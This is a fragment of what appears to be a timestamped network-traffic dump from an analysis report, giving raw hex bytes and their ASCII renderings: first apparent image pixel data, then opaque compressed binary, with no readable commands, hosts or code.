                                              2022-01-14 15:04:36 UTC96INData Raw: c4 7f 7f 3f 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 97 30 4f 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 96 99 30 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 3f 04 97 97 31 c5 97 99 31 ff 97 99 31 ff 97 99 31 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 91 24 07 96 97 30 d2 97 99 31 ff 97 99 31 ff 96 98 31 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa aa 2a 06 97 99 31 71 97 99 31 80 97 99 31 80 97 99
                                              Data Ascii: ?0O11111111110I?1111v$0111*1q11
                                              2022-01-14 15:04:36 UTC112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 97 2f 3b 96 97 31 e3 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 96 97 31 de 97 97 2f 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: /;11111111111/
                                              2022-01-14 15:04:36 UTC128INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 97 31 d4 9a 9a 2e 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 111111111111111111111111111111111111111111111111.!
                                              2022-01-14 15:04:36 UTC144INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 94 9a 2f 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 111111111111111111111111111/0
                                              2022-01-14 15:04:36 UTC160INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 96 9a 32 4c 97 99 31 ce 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 95 97 2f f5 96 99 31 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 2L111111111111/1X
                                              2022-01-14 15:04:36 UTC176INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 95 97 2f fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 98 2f db 97 99 31 ff 97 99 31 ff 96 97 30 cd 97 99 2f e7 97 99 31 ff 97 99 31 ff 95 99 31 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99
                                              Data Ascii: 11111111//110/11111111111111111111111111111
                                              2022-01-14 15:04:36 UTC192INData Raw: bf fd 0e 85 bc f5 75 f2 7e e0 e4 e1 b9 e5 a3 ad 3b b9 c1 77 27 bf c7 56 9e 3e 76 1e 9a 6d 03 a1 89 6f f9 27 1b 21 23 71 f5 da 49 cb e6 ee 5e 8d 72 7e df de 9a bc d8 07 59 f3 11 fb 0e 3f 5b 5a 3f 7a f2 77 78 96 fe 29 6f cf 80 35 4a 7e 6b ff 99 4f 3b d9 88 32 6d 92 8b 77 22 d0 90 7f da 3b d8 31 ec 76 c0 9f 3c e9 dd db 71 d6 db e9 a5 b7 7b dd 5b de f3 e9 09 b6 fd fd 1e 2a 59 d3 87 a4 23 eb 8c 1b 7b 4f 4c f6 ef 5d d0 b8 99 83 c9 86 ac bc 27 9c fd 85 1e f7 7e 87 31 75 bd 4f e2 77 ef 37 b8 43 8a 26 1e ee f6 1b 94 75 1a 1e 5d 6d da fb fd 53 7d 68 3a f1 db ee fe f5 bc 9a 78 c0 3e b5 71 44 b7 e9 dc bd 23 ed fd d6 7d 47 3a fc d0 f1 7d 5f 93 de 9e f6 2c 9c 0b f4 1c 46 8e 78 e8 73 70 f4 f8 50 74 02 f8 8b 6f 85 a3 5e ee 15 d0 57 69 71 85 72 69 f1 40 d3 5b 7f a7 ae 36
                                              Data Ascii: u~;w'V>vmo'!#qI^r~Y?[Z?zwx)o5J~kO;2mw";1v<q{[*Y#{OL]'~1uOw7C&u]mS}h:x>qD#}G:}_,FxspPto^Wiqri@[6
                                              2022-01-14 15:04:36 UTC208INData Raw: c6 0f 7f 7d 5f 23 31 1b 48 9f 9d 3b e6 9d 03 90 75 8d 71 8b 8f 05 59 df c0 b3 f7 9d 7c 6d e7 f7 47 80 5f ee 34 de 3b fd 0a d2 ae f5 e3 96 81 8f d2 f3 ae 95 e7 dd 79 d7 17 e5 ef 74 67 0b 64 9c df 0b e1 ef 74 17 01 18 63 cf 8c 6b ea d3 67 cf f8 9d a4 f3 be 50 c6 7b 21 f5 f8 85 fc 6e 08 bd bb f2 bc d7 95 f2 d5 93 94 3b 63 38 e1 67 fd 7d 47 3f 7c df d1 4f f9 1d fd f8 d9 3b fa e6 ed 67 e5 b9 c3 7e 57 9e 73 cc bb f2 bc 07 71 57 9e f3 c5 bb f2 9c eb a5 7c fb 9f f2 bb fe 47 2f ef e8 67 5f e2 ae 3c 77 38 ee ca e5 3f 2b cf d9 52 ca 97 ff 94 df f1 9f 78 f1 8e 7e ce 68 ee ca 33 5f de b5 9f f2 bb f6 73 86 70 47 3f be f6 ae 3c df 15 b8 6b 3f e5 77 ed 3b 8f f4 bc a3 9f f7 27 ee ca 73 ce 78 57 9e ff 79 70 c7 5f ca ef f8 cb 3a f4 8e 7e de d3 48 79 ce 98 73 07 3b 67 88 49
                                              Data Ascii: }_#1H;uqY|mG_4;ytgdtckgP{!n;c8g}G?|O;g~WsqW|G/g_<w8?+Rx~h3_spG?<k?w;'sxWyp_:~Hys;gI
                                              2022-01-14 15:04:36 UTC224INData Raw: d7 f0 0f af 11 fc 37 66 a5 cc f7 af 66 74 a3 d6 e6 5c 79 46 76 5c 3e 6f 37 01 54 ba e1 52 d3 6f 66 fe 31 0f d7 a1 67 61 5d e3 7c cd 1e a5 10 f5 0e c9 c3 15 21 7e 64 38 cf e3 63 0f dc 83 63 25 72 ac b7 46 55 6f 53 41 fc b6 e2 49 e9 74 68 9c e6 c9 f7 b6 f9 f6 cc 6a 23 6d a9 d6 be a2 20 66 2b 29 a6 2c cc 56 d2 f6 6c 99 6e dc 37 97 81 cc cb 5e 86 51 03 20 cb ed e1 32 99 ec 18 e2 3d 7e d8 dc 95 14 64 f9 51 d7 54 b0 f5 0f 62 d6 10 ad 4b 4b 46 6a 87 2b f7 44 dc e7 ee 15 a6 b3 fe 28 ae ca 2a 1a b4 c8 b5 09 34 20 43 7a 41 ea e4 18 74 29 a1 d3 55 f0 8d 7a 1b 77 45 9c 91 11 2e 13 04 5e df 98 0d 1a c8 93 e6 4f 81 31 c3 99 0a 06 10 79 70 5e b4 e8 c7 71 6d 37 10 b4 60 e6 1b cb ad b6 1a 85 15 97 a9 6c 7b 01 20 8e 25 37 a9 8d b9 47 22 ec bc c9 0b 5e e0 a6 aa 65 61 37 45
                                              Data Ascii: 7fft\yFv\>o7TRof1ga]|!~d8cc%rFUoSAIthj#m f+),Vln7^Q 2=~dQTbKKFj+D(*4 CzAt)UzwE.^O1yp^qm7`l{ %7G"^ea7E
                                              2022-01-14 15:04:36 UTC240INData Raw: 8c 45 dc 71 6b c1 e7 ec 55 94 31 53 96 d3 84 32 e9 2d cb e4 6f f8 c6 cc 46 9f 70 e1 ec 06 6c 38 2a 99 bb ba 86 64 87 16 e9 e4 3e b5 03 11 0a a3 be 9e bf eb 18 f1 4a a6 1d 17 22 ed d6 a5 1d 81 73 d7 65 b0 d3 0f c9 20 45 92 5b e6 80 fe 91 02 3e 19 61 90 75 6e 34 09 8b c2 5b 59 56 13 b6 e5 e8 69 53 d6 8d a9 ea fd b1 bc fd 60 cb 06 79 8b 42 ce 7d eb 88 89 c6 26 44 96 55 18 6d 19 ed e6 5a 0f de 2a 1b ae a5 b8 c8 4a 01 0d 0f a4 18 1c 74 d4 63 fa 46 d3 f6 55 74 37 b2 3d 82 26 4b 4c bd bd 00 45 e2 59 e5 d4 ba d1 ae 44 e1 de f6 1c 72 8c ec ad 6e 34 41 28 62 62 27 3a 32 dd da db ac 3a 37 91 c9 d9 2f 33 2d 55 f3 78 7a 8a 70 ea ac d6 01 a6 71 06 fa aa 49 06 65 15 94 b7 47 55 a7 c1 8f a5 cd c3 81 69 01 cf 25 11 d9 ec 84 00 82 85 52 d7 6c 0e db 63 b1 99 ba 67 5d cf e7
                                              Data Ascii: EqkU1S2-oFpl8*d>J"se E[>aun4[YViS`yB}&DUmZ*JtcFUt7=&KLEYDrn4A(bb':2:7/3-UxzpqIeGUi%Rlcg]
                                              2022-01-14 15:04:36 UTC256INData Raw: b2 68 05 98 09 bb cd 98 5b dd cd 79 18 a9 3e 48 0f 26 4e 8c 13 4b 8d c0 b2 b3 c9 0a 9f 95 54 d5 83 75 ab 2b da 0e a6 67 b3 a3 82 6b 65 27 e9 ed 61 c2 9c 00 0d c6 09 3d 26 34 34 63 d6 ac ac 65 a9 98 22 ec 29 3b 7f a0 95 ae 0e 46 8e b2 67 2c 35 a8 03 a7 da 44 d9 9c 57 12 fc 65 a2 c6 1e 8b 09 16 72 30 12 9a dd 25 20 c1 1d 38 6b cc 08 3b 13 24 41 14 25 ff ff 9c 79 db f8 b2 61 9d c0 3b b1 59 19 b7 cf e3 e6 de 48 a4 05 06 40 d3 db 83 33 b7 06 88 7c 15 a3 cb 34 7b 03 4d 3d 1f a6 25 c5 28 6f 00 c3 9d 91 31 d9 59 ca 3a 82 38 56 38 0a 19 82 7c 9f a9 ad ea 43 04 17 92 f6 c4 33 7d b0 df 0e 76 1d 45 23 6a 6d 78 b4 47 86 f3 ba 29 c3 ed 38 83 40 1a ba 8b 18 bb 11 c5 56 b2 4b 18 14 45 5b d9 dc d4 87 6e 1b f1 da c5 54 42 74 37 8e 91 00 d4 cf fa f5 f3 22 27 1d de 38 74 40
                                              Data Ascii: h[y>H&NKTu+gke'a=&44ce");Fg,5DWer0% 8k;$A%ya;YH@3|4{M=%(o1Y:8V8|C3}vE#jmxG)8@VKE[nTBt7"'8t@
                                              2022-01-14 15:04:36 UTC272INData Raw: 54 5d 6c 13 d3 77 7d d7 eb 8b d1 59 ce 3c f7 8e 5c d0 01 0c 4f 42 5d 59 ce 38 39 9a e7 02 8c 39 1b 47 b4 de a2 6a aa 87 bc 20 d4 e1 e7 f5 90 74 7c 5d 6e b7 d0 16 12 8e 65 59 3d f2 ab 28 c5 81 e9 6b 4b d0 a9 53 4c cf cb fc a4 3b 66 bf 63 54 2d 7d 8d 39 91 70 23 71 ca b3 fa e0 53 1a 99 e8 dd bb cf 76 c3 ef 32 d5 7e cf d1 7d 5b fe 9d bf 89 02 cd 1f ac fe f7 ff f2 16 ec 27 bf f7 c3 99 da 8f 5c 46 d6 e7 ff 6e b0 53 12 50 95 01 88 0a e7 a3 60 fb df 73 56 24 b3 02 2a 4f ef 23 0b 7b 19 86 1f 6f 01 01 e5 0d 1d 6d df 73 73 42 bc 6a 7f f5 8e b5 0f 78 be fa 47 af 7c 0e a3 98 90 ad 15 6b 3e 29 e3 48 70 cb bf 7c b5 8f 62 59 26 ea 6a 20 79 b0 bf b8 b7 53 cb 6b 04 69 35 f9 1a 0a a0 ee df ff 8b 8f fe 75 5f 37 23 96 5c ee e5 25 95 a5 ba a7 6a 8d 97 c0 a9 ac a3 7d c8 f9 fb
                                              Data Ascii: T]lw}Y<\OB]Y899Gj t|]neY=(kKSL;fcT-}9p#qSv2~}['\FnSP`sV$*O#{omssBjxG|k>)Hp|bY&j ySki5u_7#\%j}
                                              2022-01-14 15:04:36 UTC288INData Raw: f3 11 ce 3b 7e ff df ff fb 6b 5f f5 3f df f4 d4 db fe e4 5f 7f 6f d3 dc ec 33 ec a8 9a d5 14 11 89 80 35 95 e6 b2 5f eb ff 09 56 7b 50 c2 1f 27 1f 44 1f 8d d4 a2 00 88 fb 72 f2 be 9c 00 4e 29 86 c4 dd 52 a0 43 f5 06 ee eb 49 24 2b da ef 06 f6 48 16 45 a5 2a 7c dd bd df 11 a4 6c 0f 94 dd 80 fa 4a dd 07 f0 5f 20 a5 97 e8 a9 d3 94 fc 9a 93 e1 8e 81 d2 1b a8 8b a1 6a 50 4f 51 ef 29 27 65 9e fb 31 e0 ee 53 ff e7 fe 21 29 0b 4b 40 89 36 7c e9 8b 3e 49 75 5e 53 3b 92 a4 b4 bb 26 81 c7 b5 07 ae 37 fc b2 bf 4e c5 1a 73 28 a3 18 0e 40 94 99 14 78 7c ef a7 fa 30 50 7a 39 79 ec 3f 1c 94 48 10 63 bd 82 a3 a6 1a 9b 85 6f f7 b7 a9 3c f6 fb 0f e8 1e 72 27 d2 35 80 73 a8 76 1b f3 3e 29 b4 c4 25 82 b5 97 cd 3f f3 4d eb c2 2b f7 ec 2a d3 fe 4e f2 7a 1f c9 40 aa 6e f5 9e e2
                                              Data Ascii: ;~k_?_o35_V{P'DrN)RCI$+HE*|lJ_ jPOQ)'e1S!)K@6|>Iu^S;&7Ns(@x|0Pz9y?Hco<r'5sv>)%?M+*Nz@n
                                              2022-01-14 15:04:36 UTC304INData Raw: 11 91 a6 8c 3a 56 81 18 78 fa 86 10 de 0b 67 5b 5b 23 2e e9 0b 8b aa 8e 72 cc db f0 8b b6 ec 29 d5 1b 48 c9 40 46 59 dc 54 e0 f2 39 55 68 a7 8a ee 89 db ba f3 85 35 ab 2a 7f e8 ec 8a 6e 18 33 41 f8 c1 da b1 0c 95 b8 71 d6 ca d4 14 06 f9 29 57 0e ce 22 db 41 fa 6a 65 cd e7 48 09 64 1d 9b 6c 72 9f 79 03 dd 40 0d 59 9f be d0 94 a6 6d 1b 26 99 5f 37 05 61 7d d9 9d b1 c4 05 fe 54 d0 ab 35 1b 9a 06 69 c4 19 e0 67 9b a0 a7 84 45 ac 5b b1 29 b5 38 29 3d c0 b8 13 59 d3 62 92 9a e4 03 69 42 52 c6 aa 80 96 d6 25 e9 7b 40 59 00 5a 4d d4 34 6f 4f 15 a0 a7 48 ef e9 61 38 2c ad e5 06 66 53 30 05 75 d9 75 18 94 d8 00 84 9e 19 e4 91 02 9f b0 ae 50 bd 9c 90 6e 58 e5 23 43 ce 46 8f 08 7d 50 e0 01 c9 1b e1 1b 76 cf 0b 82 7d 38 01 77 9d 7d b8 28 1a 1c 8d 23 2d e1 84 1b 11 26
                                              Data Ascii: :Vxg[[#.r)H@FYT9Uh5*n3Aq)W"AjeHdlry@Ym&_7a}T5igE[)8)=YbiBR%{@YZM4oOHa8,fS0uuPnX#CF}Pv}8w}(#-&
                                              2022-01-14 15:04:36 UTC320INData Raw: 0d 45 20 20 88 20 78 44 2f 8c cb 26 2c 33 b8 00 a6 91 01 3b 6a d1 81 6d a4 86 06 42 3d 73 52 5c b8 9b 99 f1 5e 53 91 e2 6f 64 53 65 4d 83 dd 16 2d 7d 39 86 9a 3b 7a a0 39 dd 44 63 60 35 be 40 b1 e8 8d 13 31 25 6e 91 a3 b6 6d 7d ef c6 d4 12 17 9d 53 7a 80 be f2 b4 8c 69 59 dd 57 bb c4 1d 26 6e c9 57 55 07 ef fc 48 e5 62 9e 2c 62 bd 88 c1 86 58 ba f6 2e 13 b2 05 39 90 74 07 ed b0 96 26 e5 d6 1d 94 4d 06 0b 25 b1 ca e6 31 07 6e 1b a3 24 9b 13 b5 cf ba 97 39 46 59 14 6c 6d 49 96 51 f1 44 a7 15 5f c6 d1 40 52 b6 b4 73 d8 19 c2 f3 e3 48 e2 86 59 77 6d b8 84 52 6f 4f b0 4a ca 14 02 5b ab 91 22 73 ea b9 16 18 b1 32 6b 4a bf f6 40 3e 42 b8 38 1f 1c 97 c2 46 70 e5 9b 99 fd 56 d4 37 c7 82 dc a8 b5 da 1e dd 33 a9 21 59 d4 15 67 c4 0f 33 8c 95 26 a6 c9 72 7b f7 36 cd
                                              Data Ascii: E xD/&,3;jmB=sR\^SodSeM-}9;z9Dc`5@1%nm}SziYW&nWUHb,bX.9t&M%1n$9FYlmIQD_@RsHYwmRoOJ["s2kJ@>B8FpV73!Yg3&r{6
                                              2022-01-14 15:04:36 UTC336INData Raw: 41 55 b8 6b 66 55 30 fd 15 da f4 b3 37 ea 3c 98 a0 a3 58 88 d6 3b 2d ba 70 7b b1 19 0b f9 d5 d3 e0 52 50 64 2e bc 4b 41 41 9b 4f a4 b0 7c d0 ac e8 68 40 47 f0 bc 32 25 9c 63 f6 35 23 e6 85 19 7d 7e 56 39 33 0f 2c 3a ee 3c 6e 94 77 d4 05 55 85 56 e1 f7 6c 8d ce 1a 35 73 a7 92 8c 18 35 81 83 0e 3f d4 69 39 e7 12 c8 1d b6 19 94 84 2c 6f 0e a8 1a 57 41 69 3f 9b 60 d6 9c 26 c1 4d 3c 2a 85 d1 30 5c f4 d6 ef 88 f3 25 7b 21 d9 08 f1 f3 45 37 09 8f 07 95 f3 8c 2c 44 cf 73 6b 26 33 40 80 b9 2e 2e a9 0a 5a c1 5a 3f 1d d1 01 2b 43 5d 18 4c 96 e4 3b 25 74 16 a3 4f fb 31 46 10 21 e4 59 e5 ee c0 34 2c aa f2 8e 54 30 28 2c f0 96 92 82 1b 44 09 81 b1 1f 57 ed 14 a3 60 59 94 45 4d e7 a4 c4 3c 5f 9d 8e 01 23 6c 96 af 20 48 95 52 36 58 fe f0 5c 55 ba 0a 31 61 67 42 5d 66 0c
                                              Data Ascii: AUkfU07<X;-p{RPd.KAAO|h@G2%c5#}~V93,:<nwUVl5s5?i9,oWAi?`&M<*0\%{!E7,Dsk&3@..ZZ?+C]L;%tO1F!Y4,T0(,DW`YEM<_#l HR6X\U1agB]f
                                              2022-01-14 15:04:36 UTC352INData Raw: b4 1b 91 34 0f aa 67 17 a2 73 33 c2 8d 04 6e d4 6d ac aa 9e c4 1a fb cb 50 c5 51 10 8f 95 e6 58 75 7f e5 9e f2 87 8e 8c 33 0e 5f 73 96 bc 40 db b7 95 36 13 51 83 c0 ef ae 12 0d 55 57 ee 87 4a 2e f3 51 11 0c 67 8c a2 8a 30 25 a9 45 29 cc e7 ce 1d 5f 73 62 aa aa 3c e0 1c ab 71 a2 06 75 6b 17 f4 df 72 5b 6d d4 0d 22 b0 a4 e1 22 b6 0a ca 0e be e2 41 18 66 4e 6c 55 0f 1a ac 8b c8 a4 43 f0 22 9b 55 11 c8 09 04 c3 ed a2 ac 29 8c ee a2 92 86 7a b1 df 80 33 c4 f8 b4 aa 2f ef 06 95 6d 4e df be 06 22 a2 26 07 01 0b e2 bb 3a ab df fc fa 07 5b 1f f8 f4 97 eb 42 b6 e1 cf c3 ff 46 e9 fc 9f eb e9 ba 4a db 17 04 bf f8 f9 ab cc 57 fe b8 f1 c1 d7 7d f8 90 04 38 cf 82 d5 8d 39 aa b3 d4 f7 82 4f dc 73 fe e2 ff 00 2b 26 c2 57 f7 85 4f 8e 01 52 4a 03 8d f6 8e dd 3c 56 00 5a 0c
                                              Data Ascii: 4gs3nmPQXu3_s@6QUWJ.Qg0%E)_sb<qukr[m""AfNlUC"U)z3/mN"&:[BFJW}89Os+&WORJ<VZ
                                              2022-01-14 15:04:36 UTC368INData Raw: ae a8 b3 5b 02 06 f4 fe 36 7d ee 97 02 a4 9a f9 ba cc 5c 83 19 9a 6a bd 07 3c ce 00 25 cd be 5e 48 83 d2 1c 28 6e f4 98 da 2b 06 b0 a4 3e f1 92 89 88 b9 03 ab 7f 76 53 c5 2b 20 7d f4 ce bb e4 85 2b 80 e4 fe 10 40 8a be 87 3e 4f 91 7e 5d e5 d2 0c eb 55 2f 31 7d 91 96 86 34 18 7e 28 39 4a 8a 68 56 67 a7 fc f7 f6 96 ef 26 4b d4 1e 2d 03 87 d9 cf cd 00 cf 3d ea 8d e4 93 e4 2b 9e 49 5d 10 90 ef bd 2b 5d 78 58 14 aa 1b 3a c9 f7 d2 0c f1 c3 54 99 54 2f 66 e4 2c d2 85 4a bb 4c 9e 55 6a bb a1 81 80 e9 c1 a2 1d 3c ea e0 80 ee 02 41 60 9f 76 76 d2 68 64 4d 00 d8 85 97 d6 3c ab cd cb b3 3b 24 79 04 c1 90 c9 62 9b 39 19 19 f8 ba 4f f3 96 3b 25 e9 5c 96 92 0f 07 c2 aa f8 f9 3c ab 79 bb ce 4a 02 58 cc 07 45 58 37 c2 4c c4 b8 83 ef e5 08 52 50 d8 24 b0 70 0d 52 0c f7 bb
                                              Data Ascii: [6}\j<%^H(n+>vS+ }+@>O~]U/1}4~(9JhVg&K-=+I]+]xX:TT/f,JLUj<A`vvhdM<;$yb9O;%\<yJXEX7LRP$pR
                                              2022-01-14 15:04:36 UTC384INData Raw: ed 07 89 b3 9c b8 e3 2a b1 6a be 10 db 2f 29 1a b0 7e 50 58 a4 17 38 31 7d 57 3f 6d 13 ff e4 74 7f 1c 32 76 d1 ba c2 72 ad 39 09 46 51 5e 27 01 b3 f4 70 c8 5d 3a 8a 20 65 fd a8 05 a1 23 4f d2 d1 9a 55 0c f8 45 cf b9 85 51 8a ee d8 c0 c0 e4 6d 67 f2 a2 22 b5 b4 53 60 14 0e 83 7a 15 a8 1a bb a6 08 e2 05 d9 28 4f 1b 8f f8 92 82 f8 19 a8 8b 1e 63 e2 6d 0f e2 19 58 dd 2b dc 9b bd 0c d0 9a 12 98 59 e2 ee 47 6b d6 e0 36 63 33 b6 37 50 40 11 e6 5b da 5d 59 ea 18 73 a3 7c c4 ea e7 d6 8c 51 39 44 0d 8c 74 26 1d ab 78 b4 55 56 28 43 3b 44 81 a1 a9 69 d4 83 24 a8 08 56 58 a8 c5 07 7b 73 db db 53 ac e4 53 b9 9f 51 f0 a6 8e 7a a6 88 30 2e f3 9f df 28 fd a1 8a 72 40 09 ab a7 c2 0c c1 06 6e 7c 03 4b d0 ac 13 59 ac 7d 53 c3 5e 41 83 c6 81 ab 29 0c a1 41 f9 92 d7 60 05 14
                                              Data Ascii: *j/)~PX81}W?mt2vr9FQ^'p]: e#OUEQmg"S`z(OcmX+YGk6c37P@[]Ys|Q9Dt&xUV(C;Di$VX{sSSQz0.(r@n|KY}S^A)A`
                                              2022-01-14 15:04:36 UTC400INData Raw: 35 2a 58 79 0d ee 4e f2 86 13 95 d6 ce 4a e7 7e ef 8d 2a 77 9b e5 65 8c 49 47 b2 a7 55 19 4d 7d 01 2a 68 8b 07 50 84 bf f6 69 58 95 e3 99 b3 60 1b 00 1b a9 ee a8 32 0c f1 b2 d2 b8 7b 3f cb 4b 42 d4 19 7f 7d a1 07 c1 6e 45 8d 98 47 e1 91 6a ec 6a cf 30 cf f4 56 2b ee 1f af 61 dd 20 67 9d 71 b4 52 bf b5 28 87 ef fc fc fa f1 0a 35 ea 6e 18 13 2a 92 ee f2 9b 69 03 2d a1 4a b7 86 72 4c bf 97 c3 9e 78 7c e1 89 cb 2d 67 dd 88 ce a1 67 2e a5 1a 5b df 84 d3 c0 de 82 a2 11 e8 a3 2b e3 24 ac bf 8d c8 26 ce 00 7b ab 34 86 a3 ca 5a b8 79 36 b0 d7 ee 26 32 ad 60 28 2f 1f a7 5d 4b b6 85 6f d1 43 97 b1 59 2b 82 59 12 b6 da c8 68 4e 1f d7 2f 37 9c 1a ad e8 8e 1d d6 06 fe fa 8f eb 4e 1a bf fa b6 bf fa 9b f7 32 e4 9c af 0b 66 de f7 88 da 7d 07 22 f8 5f b2 ef 9a 7c f6 f7 be
                                              Data Ascii: 5*XyNJ~*weIGUM}*hPiX`2{?KB}nEGjj0V+a gqR(5n*i-JrLx|-gg.[+$&{4Zy6&2`(/]KoCY+YhN/7N2f}"_|
                                              2022-01-14 15:04:36 UTC416INData Raw: 68 de be e0 b3 7a dc 8e eb ff 00 2b d1 06 7b 52 4c 15 bf af 01 dc b3 a1 00 03 48 09 bc c5 7d a3 08 2d 91 df 2f 5c 76 11 16 4a 1a 2e f7 eb 00 f7 3e 2b 6a bf bd 4d 20 4a ca b3 93 a7 88 86 c2 62 57 be fd 71 21 fd 5b d7 27 0b 8a cd 50 b2 d1 f7 1a 39 b5 a4 66 09 8c 48 89 45 1d a3 44 d5 92 d6 24 13 53 50 ef ff b4 1a 97 f5 00 1f f9 b9 d3 f7 ee 6d 0b fb b5 81 e5 df df 50 f2 f2 ee 2b ff 42 d2 43 52 6e 4e 4e 48 59 fa a9 ed 6f 92 d2 8f 1c 43 f3 24 95 67 85 5b 5f 47 3e 3f 7f 78 f4 d5 d7 3d 3c fa da da 7d 07 fc 7b ee d5 3b 46 ac dc 17 a8 42 7b 8f 02 2f dd 13 94 2d 43 39 7e 2d 90 b3 7f 16 e7 cd 5f 89 cf d6 94 0c fc a9 ec c1 12 70 ff 13 e1 c7 9f 2b 8d f0 ed 67 a9 d4 85 57 95 26 2f 35 8c 20 bf 23 11 7e dd 53 5b 65 c1 bd a5 24 61 4a e0 17 fb 60 c2 4a 39 d8 87 b7 a5 e8 e8
                                              Data Ascii: hz+{RLH}-/\vJ.>+jM JbWq!['P9fHED$SPmP+BCRnNNHYoC$g[_G>?x=<}{;FB{/-C9~-_p+gW&/5 #~S[e$aJ`J9
